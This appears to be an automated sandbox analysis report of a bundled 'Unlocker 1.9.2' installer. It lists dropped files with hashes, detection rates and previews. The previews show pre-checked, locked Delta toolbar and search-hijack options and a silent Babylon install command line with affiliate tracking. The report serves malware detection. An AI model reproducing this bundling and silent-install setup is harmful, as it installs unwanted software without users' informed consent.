                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8704
                                                                                                                                                            Entropy (8bit):4.98329973703044
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:TvYfTLHRm6VMp8PS5JTMNF4m1AcFM8S6Y3+IsONTv2e6BL:TvY+8PS5JwHV1Te8S6YW6Tv2e6
                                                                                                                                                            MD5:5790A04F78C61C3CAEA7DDD6F01829D2
                                                                                                                                                            SHA1:9D783D964338A5378280DD3C3B72519D11F73FFA
                                                                                                                                                            SHA-256:726B0E7E515F7BD62C912B094FA95C7C2285A44E03D264F5DD9E70729C0E9606
                                                                                                                                                            SHA-512:9134FC02095E313FCB528FA32C8534929FDDFB7B7B139A829F2B3EB32CD4C606F6D2EC6DFF57A890EA250CE1430EB272461ACCFE05164BD4CFA496C0A1474AD0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):520234
                                                                                                                                                            Entropy (8bit):6.562174410690013
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:RgEF6lmEVKtkDCQ/kUrc7dBLhuKgrQCjBXPTnrKcCxcfKvrLJLqgx5YMk4HJ0yPF:GEEdkUrc7RuKcQCdGVtT0MkCwwV/Hn
                                                                                                                                                            MD5:0F66E8E2340569FB17E774DAC2010E31
                                                                                                                                                            SHA1:406BB6854E7384FF77C0B847BF2F24F3315874A3
                                                                                                                                                            SHA-256:DE818C832308B82C2FABD5D3D4339C489E6F4E9D32BB8152C0DCD8359392695F
                                                                                                                                                            SHA-512:39275DF6E210836286E62A95ACE7F66C7D2736A07B80F9B7E9BD2A716A6D074C79DEAE54E2D21505B74BAC63DF0328D6780A2129CDFDA93AEC1F75B523DA9E05
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1898992
                                                                                                                                                            Entropy (8bit):5.743047590845145
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:knARLFkMxNcIs5WLDbZfGG98dhNmpejZCPiXnE2yYH0e8U07:BFkw7s5WcYkjZCwE2dH0e8UG
                                                                                                                                                            MD5:26F6D1B6756A83DE9755A05F7C030D75
                                                                                                                                                            SHA1:935F58155F74B051F9123B6022B7D358B52B146F
                                                                                                                                                            SHA-256:2ACAB7C986BBF80578C3BD998DD2D853257719CEB74C9D30BB4EA28952403D5B
                                                                                                                                                            SHA-512:AF9603572BDDB6244A7AB0484CB3AC9ED7C91B1CEA3E3F8C8886478930DBC102925B45ED094EAA2801755644E3BB4A4C0685A423F937F4B02AF16FEEC56E4F6F
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 23%
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91790
                                                                                                                                                            Entropy (8bit):7.9969876797429755
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:1536:YYMRZJnf4lTn61qnl4nJszUaFsQZFWT9a5wSFU/BTi5MjmMoa7OYCVumZJBE:YYgJmOs4nJwFRZFSa5vUoumaE8mZJBE
                                                                                                                                                            MD5:407846797C5BA247ABEB5FA7C0C0BA05
                                                                                                                                                            SHA1:44386455EED8E74D75E95E9E81E96A19F0B27884
                                                                                                                                                            SHA-256:0147B5B11B935310752666FCF1E6AFC922B76FF03D01A0D1EE2BABEAC10CA1E3
                                                                                                                                                            SHA-512:7399A9228F971698DB7362AAD28D3F9694C0BF453D4529E48BC7869AF0960452CFE1A5F0A5754E7D567D81B5AA1E35BE05A9E36EC745E5470D20FD44A61D20AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205
                                                                                                                                                            Entropy (8bit):4.9535990881965635
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SC2nnnPjnu5AqBQW1ALepBTY2EUHgLJpB1GHGDusAY75E8SlQkQGEie0GUGl:SDnPoPB/mLepBREUALJv1TX9EDKJ5sGl
                                                                                                                                                            MD5:90713AB7A74884CD36A5FB4CFCDECE8A
                                                                                                                                                            SHA1:7BB56D08FD69A98E543B923BD0A9156F92A9C473
                                                                                                                                                            SHA-256:BC40813F6D07DBC1A4D4C74363460D1AD6EE76275729DE4C4F10EC40D8CC46EB
                                                                                                                                                            SHA-512:639D68135FB54264F2E21081D6CA9FFE73A94035982F4A2D7133D6D402CDD3EF4A695EEB61AD173DC6D1B8167D1F5DF2BE61A972C96F07AC357ECEC887A0D191
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A>..................c.......e..HKEY_NONE........babtb1........8..babylonsig=0000ddc5393a3898d6fab33f1b7634f4cacf2f4dc9ddfcbcc1defbd0ce593049:0000d32e061a0029c5ccdae47322435ba6e55cac53459f5d334a8ccfc03203ca
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.747151880874695
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnn/9HNhcGVUDTERd8oDFLSbhlVEHgUVwkdHYzHcLSTp43FQClB/YcYN:LChgnl8GVUDTERCoDt8V8PVwkFYqSVgE
                                                                                                                                                            MD5:4F6E1FDBEF102CDBD379FDAC550B9F48
                                                                                                                                                            SHA1:5DA6EE5B88A4040C80E5269E0CD2B0880B20659C
                                                                                                                                                            SHA-256:E58EA352C050E6353FB5B4FA32A97800298C1603489D3B47794509AF6C89EC4C
                                                                                                                                                            SHA-512:54EFC9BDE44F332932A97396E59ECA5B6EA1AC72F929CCFFA1BDAB96DC3AE8D61E126ADBD26D12D0BC83141CEE03B24AD2BADA411230C4708B7A9AE9C60AECBE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A...................j........<\...babylonsig=000073e9c01f6a45cc864dc02a0f7bf8bcabc4db855fc5bd7a04d0abc34be5df:0000050db25f8bdf7e3b9e906bf562b69d8997079c552e0c644fd006193bd428
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):249
                                                                                                                                                            Entropy (8bit):5.365979053267958
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:t8knqres54xUSIJY7rsNXVO5HzVUTA010HkiYKoYb7orHTMS:t8knqPCxUNYXsFcNzVUM0109Y6/ozTT
                                                                                                                                                            MD5:A4AF0A0C254B38F2F9EECBF0E00B08FE
                                                                                                                                                            SHA1:EF730BCE77699730DDA378DC444B997CE7CEEA7A
                                                                                                                                                            SHA-256:810E0E32D54B9E1557DA7CCF1CA9F6354814E90DADC6B4AF5E1CBDF87FAC925A
                                                                                                                                                            SHA-512:B74596E55E75413303559C135DB393A04D6FD6CBAB147A51AC2F46435F52B92B82868DE4E67917A7B388D82C672FA36B525B88E2EEFE7EC40695F028395DCD84
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@i....................@YHKEY_CLASSES_ROOT\AppID\{BDB69379-802F-4eaf-B541-F8DE92DD98DB}\Instl\Data...........babylonsig=000100374627dcb412ef9c7f6e6383eb408216ef2e8c99cab4a28ea690db202a:00006cc208e02b54e138d1ec1b02ef66d0b7f8e02d0d3a2c12c6a72548b0fc07
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):234
                                                                                                                                                            Entropy (8bit):5.1257718700950665
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:elm7gnnn7nlun8FxIEyLdKC1xZ1jPAUFA9EHANrQ3wV39VuVUjKGBTc6+HYXDwDe:fgn8n8zIxdK2HG7EgNEg39MmIYXUDQQU
                                                                                                                                                            MD5:6358860CD0C336C1F91F86BE701D77C4
                                                                                                                                                            SHA1:5DD38B818BF0860B4C5144BA670A759D4345E4EC
                                                                                                                                                            SHA-256:2ED42E3C958EB21352BAE4B00DB2FA5BE94149ABC64EEC93E5258B9C4A715457
                                                                                                                                                            SHA-512:7DF3B3E1487D3A65000B6208969F1E695815133C052F369BEB36877FE5C6F64D979AEFD030A193B04A5E46FB0D97A3CC06837AA381EFE6BC24A0C084C768DAC1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@Z..............2........."search.babylon.com.......$www.claro-search.com...... .........9...babylonsig=000014b501afb12514e838be35fd24590f9f095658a0cdd234df33a6003ea621:0000627597f0acd7d524976ccd69bab0cb4198771d23d12f21d1af554430d7ef
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):178
                                                                                                                                                            Entropy (8bit):4.797553801917334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PC2nnnxnzkS2gfE8JfizV3RT3d/7lkVVYQdyFE6MBvhShRO7H/bSGPX:62n+S2V8Vu3139lkVVYX+NB8ADT1PX
                                                                                                                                                            MD5:0B7BE9C4B72C2C5166BFD61CA5EBBFED
                                                                                                                                                            SHA1:AEA0AA4E8226C1B4EFCE92E909DA773744BAA6D4
                                                                                                                                                            SHA-256:673BF972D308BC6108360575608CF72F393413F2D3993489B06DA4A6EFC749BD
                                                                                                                                                            SHA-512:4DCD7EA01B05550ACB00B71E7E9FDD52A04FE1CC574655030DCAE94B87DAD86BFB7973ADF9185DE03BCACB100FFF758B1A2F928FCB951E2B31E320860A2226D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A#..............2.................b+..babylonsig=0000b7d47988ec9b6d29c69c2d65aa0453a80949ffe47b173bcbcbaf1664b37f:0000d475e18513509c850255a7e329dacbd702f4edee04be1371ccd95bc05742
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.752125358171384
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnnShk1X3slFi0U6tgFnlHOW8O+NYXnbcE0aBSVXdE1TbSXQK:LChgnShklvkWFnd+2XbciSV0SXQK
                                                                                                                                                            MD5:7E72D256E34635D351092955D1F8516B
                                                                                                                                                            SHA1:7F240F8F4BD61AE59247D84D0EC85F5BC8729F36
                                                                                                                                                            SHA-256:39EB1667A67149B5D930E5408896027E3C3FC06282735E61CB8D85F5B38F587C
                                                                                                                                                            SHA-512:621EB4BF2864DB2FA0F861C233CED790124E9060C081948BEB7117F8C058A36ECCA23EE05CE2D6D42AF15533C050F648D276589682D91DFE699EBE871CC9AE8C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A..............................o|.babylonsig=0000f7ffd199a6d07f03f6b2b8764a34a26e4dc1ed5ba9a3d998872127314113:0000cb9730cf6e41158f8f209a78d8121f40b07026490a300c0a084fb724d516
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):520234
                                                                                                                                                            Entropy (8bit):6.562174410690013
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:RgEF6lmEVKtkDCQ/kUrc7dBLhuKgrQCjBXPTnrKcCxcfKvrLJLqgx5YMk4HJ0yPF:GEEdkUrc7RuKcQCdGVtT0MkCwwV/Hn
                                                                                                                                                            MD5:0F66E8E2340569FB17E774DAC2010E31
                                                                                                                                                            SHA1:406BB6854E7384FF77C0B847BF2F24F3315874A3
                                                                                                                                                            SHA-256:DE818C832308B82C2FABD5D3D4339C489E6F4E9D32BB8152C0DCD8359392695F
                                                                                                                                                            SHA-512:39275DF6E210836286E62A95ACE7F66C7D2736A07B80F9B7E9BD2A716A6D074C79DEAE54E2D21505B74BAC63DF0328D6780A2129CDFDA93AEC1F75B523DA9E05
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):785904
                                                                                                                                                            Entropy (8bit):7.996461190547012
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:XSsZfDKTpv0aNjLDiIx56qQDtOZTIzOjAWe0YiZ2PADaRx6Zfuc//yTuXbdir7+:XSiGTpTLDxxwqQcqOj5eyHox6ZGmAuXr
                                                                                                                                                            MD5:EB2764885565B6C01CB32E5F51F213B3
                                                                                                                                                            SHA1:CC41CADBBD6BA6ED0BFDD17798B4C9F94D7955E0
                                                                                                                                                            SHA-256:D7146999FF94B3AE092F3213DDF0217615F1D38798393B66778D11AAE2B68EAF
                                                                                                                                                            SHA-512:AC88795B2E8260ACE9EB57D2A3FDC4AADB18E2CB0AFD780459F51D25F83B34F7033425DC712655E423EBA4E011FD2776F53463042F2C2D9DD427554C04CC840E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):147456
                                                                                                                                                            Entropy (8bit):0.47889536469736377
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:MHVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                                                                                                                                            MD5:D6648BE90F0B2A39C26D60D499E5EB03
                                                                                                                                                            SHA1:69D2F56BBA9264621C0779F5D74B356C3794AFF0
                                                                                                                                                            SHA-256:E26A78FA6C8A1C60B67536CCB9A620F69FF4588F50F7F3956E14E438C6E5F9D6
                                                                                                                                                            SHA-512:BEF8A8D7391D16444B6347C1F2E07037EE1DF67652910551133919EF59F44C94636971BF602D93087D628A6E38DDF0929CF4C824994B35E6C2376B0B55AD4974
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:Generic INItialization configuration [Field 1]
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2010
                                                                                                                                                            Entropy (8bit):5.346412823747478
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:51ObX/Yfq9P9/T4KIQfgjQonfzDnDopg1TSpnmXdXdiRRwXTEV/MdWnrr8Xs:20KJc1Q4UonfzDnlTGnmegQVkdWE8
                                                                                                                                                            MD5:54679821D7899828769A563C999E71A3
                                                                                                                                                            SHA1:4B81B64545A824DE4702296FE816F4138FB58F22
                                                                                                                                                            SHA-256:0E82D51C269946CA6AC4C567CFCFEBF4E59282BF306ACE831B789EF5EBA28AE6
                                                                                                                                                            SHA-512:11E6C40E1484686CDBAC87ACCF6DE2429A8BC6CF6A33ADE7D606EDE6A45EF8D787E798621ED011656DE1221383E49D06DB8CBC78C3C2432DD4232B9589D731EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[Settings]..NumFields=13..RTL=0..State=0....[Field 1]..Type=RadioButton..Text=Quick (Recommended)..Left=50..Right=280..Top=0..Bottom=8..Flags=NOTABSTOP|NOTIFY..State=1..HWND=262172....[Field 2]..Type=Bitmap..Text=C:\Users\user\AppData\Local\Temp\nsv5446.tmp\delta_logo_small.bmp..Left=0..Right=35..Top=0..Bottom=135..Flags=NOTABSTOP..HWND=1179738....[Field 3]..Type=checkbox..Text=Install Delta toolbar..Left=62..Right=-10..Top=76..Bottom=84..State=1..Flags=DISABLED..HWND=1769526....[Field 4]..Type=checkbox..Text=Make Delta my default search engine..Left=72..Right=-10..Top=88..Bottom=96..State=1..Flags=DISABLED..HWND=66532....[Field 5]..Type=checkbox..Text=Make Delta my default homepage and new tab..Left=72..Right=-10..Top=100..Bottom=108..State=1..Flags=DISABLED..HWND=66534....[Field 6]..Type=label..Text=By clicking next you accept the..Left=50..Right=149..Top=130..Bottom=138..Flags=NOTABSTOP..HWND=66536....[Field 7]..Type=Link..Text=legal terms..Left=150..Right=186..Top=130..Bottom=138.
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14848
                                                                                                                                                            Entropy (8bit):5.550299117674118
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:86d+dHXLHQOPiY53uiUdigyU+WsPdc/A1A+2jwK72dwF7dBEnbok:86UdHXcIiY535zBt2jw+BEnbo
                                                                                                                                                            MD5:325B008AEC81E5AAA57096F05D4212B5
                                                                                                                                                            SHA1:27A2D89747A20305B6518438EFF5B9F57F7DF5C3
                                                                                                                                                            SHA-256:C9CD5C9609E70005926AE5171726A4142FFBCCCC771D307EFCD195DAFC1E6B4B
                                                                                                                                                            SHA-512:18362B3AEE529A27E85CC087627ECF6E2D21196D725F499C4A185CB3A380999F43FF1833A8EBEC3F5BA1D3A113EF83185770E663854121F2D8B885790115AFDF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5632
                                                                                                                                                            Entropy (8bit):3.951555564830228
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:iV6pAvmNC6iMPUptxEZK65x/AmvycNSmwVsOYJyvrpXptp/JvR0Jlof5d2:2811GED5ZTvycNSmwVsTJuftpZR0Sd2
                                                                                                                                                            MD5:9384F4007C492D4FA040924F31C00166
                                                                                                                                                            SHA1:ABA37FAEF30D7C445584C688A0B5638F5DB31C7B
                                                                                                                                                            SHA-256:60A964095AF1BE79F6A99B22212FEFE2D16F5A0AFD7E707D14394E4143E3F4F5
                                                                                                                                                            SHA-512:68F158887E24302673227ADFFC688FD3EDABF097D7F5410F983E06C6B9C7344CA1D8A45C7FA05553ADCC5987993DF3A298763477168D4842E554C4EB93B9AAAF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11264
                                                                                                                                                            Entropy (8bit):5.568877095847681
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
                                                                                                                                                            MD5:C17103AE9072A06DA581DEC998343FC1
                                                                                                                                                            SHA1:B72148C6BDFAADA8B8C3F950E610EE7CF1DA1F8D
                                                                                                                                                            SHA-256:DC58D8AD81CACB0C1ED72E33BFF8F23EA40B5252B5BB55D393A0903E6819AE2F
                                                                                                                                                            SHA-512:D32A71AAEF18E993F28096D536E41C4D016850721B31171513CE28BBD805A54FD290B7C3E9D935F72E676A1ACFB4F0DCC89D95040A0DD29F2B6975855C18986F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 50 x 46 x 32, resolution 5905 x 5905 px/m, cbSize 9254, bits offset 54
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9275
                                                                                                                                                            Entropy (8bit):5.943259792257716
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:NFwO6xAA7skBZgZIY1nIcg9tmZ0Hcy7y5q7WvbVZE8qObUO5wG3:6JYOqIhP9tmZ0Hcy7y5q7WvbUs3
                                                                                                                                                            MD5:2786F736B7A2022A9117FA8CDDF7269B
                                                                                                                                                            SHA1:FEEFBA3044896EABE63545DF3FC50056C7663002
                                                                                                                                                            SHA-256:C92E8E901C8FF0B2384840200D2A22A9FD357F6A3D8784E5DA6F93CD863D3CAD
                                                                                                                                                            SHA-512:F9160AD0D4B429250BD7B0701CEAB4E7AAA643BB478309B7F684C12BA6EC3FB6F9F50141A347302314923929D74E9F5C1A6F2672F0056B0801215CDD64A030EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:Generic INItialization configuration [Field 1]
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):559
                                                                                                                                                            Entropy (8bit):5.39665167623721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:lOuf9VTsAgQRvAYfUhc64gNhBLfz4gNDHFl8s3Ny:1TdRvAYfUhj1Jz1ZHF1c
                                                                                                                                                            MD5:31C1A4EDAB5060EF502AB8056AAC8CDD
                                                                                                                                                            SHA1:7836E5B34BFC93A10D6741361E8834A1FAB5C241
                                                                                                                                                            SHA-256:02E0849DE47863304467BF458C7773D237DD3444DF68F12469C24E9C4135833F
                                                                                                                                                            SHA-512:DD1054EC85B88B8CF8BFF0F61525BD3F80CC938FA8FE53BE0E7B21EA341813A234BD44D261CB2171D53D8D18C0D2EFB1110ACAB92D0701A088212F27C9680A85
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[Settings]..Rect=1044..NumFields=3..RTL=0..NextButtonText=&Finish..CancelEnabled=..State=0..[Field 1]..Type=bitmap..Left=0..Right=109..Top=0..Bottom=193..Flags=RESIZETOFIT..Text=C:\Users\user\AppData\Local\Temp\nsv5446.tmp\modern-wizard.bmp..HWND=1048652..[Field 2]..Type=label..Left=120..Right=315..Top=10..Text=Completing the Unlocker 1.9.2 Setup Wizard..Bottom=38..HWND=589944..[Field 3]..Type=label..Left=120..Right=315..Top=45..Bottom=185..Text=Unlocker 1.9.2 has been installed on your computer.\r\n\r\nClick Finish to close this wizard...HWND=983616..
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4, image size 26376, resolution 2834 x 2834 px/m, cbSize 26494, bits offset 118
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26494
                                                                                                                                                            Entropy (8bit):1.9568109962493656
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
                                                                                                                                                            MD5:CBE40FD2B1EC96DAEDC65DA172D90022
                                                                                                                                                            SHA1:366C216220AA4329DFF6C485FD0E9B0F4F0A7944
                                                                                                                                                            SHA-256:3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
                                                                                                                                                            SHA-512:62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (716), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2668
                                                                                                                                                            Entropy (8bit):5.580519497259905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:nsyFvSwyjmFkBFnqPAtGIBX84dxTOvNlTw0tGu+84dxTjLmM:PFvly0kvnqPSAuOvbTB7du/
                                                                                                                                                            MD5:0C162D66ED16C5EB9884C940A4172221
                                                                                                                                                            SHA1:7AF743A90BF08416663EBB60C22D223C921CEC17
                                                                                                                                                            SHA-256:022AC19BD96D54692FD5760648531FDAC053AC459DBE0130B3A5F5790EDD1005
                                                                                                                                                            SHA-512:F32CEE2E621A79F17502F4B6F5392821E1E9A9AF035A62F7BB8458BC24885B1D947C65ABA50C565D4529B52D1A307FC23313536BD1AB10542CB203A782DA91BF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...----------- 17/02/23 - running v9.1.1.10 on 841675 (user:user) -----------.. Windows Path: C:\Windows..13:06:55 (Setup)-Command line: -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt...13:06:55 (Client)-LM file is C:\ProgramData\Babylon\BabAll.dat...13:06:55 (Client)-LM imported to file...13:06:57 (Client)-LM file access denied...13:06:58 (Setup)-UI lang: 0, src: 4...13:06:58 (Setup)-SourceDir: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\...13:06:58 (Setup)-InstallDir: C:\Program Files (x86)\Babylon\Babylon-Pro\...13:06:58 (Setup)-SilentInstall: 1...13:06:58 (Setup)-MinRequirements: 0...13:06:58 (Setup)-IsUpgrade: 0...13:06:58 (Setup)-TBInstallState: 4...13:06:58 (Setup)-SetupType: 50...13:06:58 (Setup)-SetupFlags: 42...13:06:58 (Setup)-PrevVersion: 0...13:06:58 (Setup)-TBInstall: 1...13:06:58 (Setup)-Report: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-star
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Mar 31 20:28:36 2011, mtime=Fri Feb 17 11:07:00 2023, atime=Thu Mar 31 20:28:36 2011, length=1689, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):877
                                                                                                                                                            Entropy (8bit):4.574842873587008
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8m9DcXYXzhElcdpF4yfgrt1y3Y+KDMYjA8SmbdpMxqtbdpMx8wl5ieuieMBm:8m9DLd1mEI1DM8ArCd+8d+qwGexeMBm
                                                                                                                                                            MD5:C04F99A1FE6024B224A964D8091D6957
                                                                                                                                                            SHA1:12DAF6E9C5FDD7FBAF0031D9C4D41097EA77BD58
                                                                                                                                                            SHA-256:37D5B444B282158EF66E35042F2D3B4CE233DE8F8383CF0659F08E6ABD21B0C7
                                                                                                                                                            SHA-512:2BDEF554CE3C4222C1B8219358FE5F065E97FA20AFEB06BA81DD48E081CEB3CE21051C7A685D0869F7E2359F7C1147211E66A077F9966C56C3520B460655B5DA
                                                                                                                                                            Malicious:false
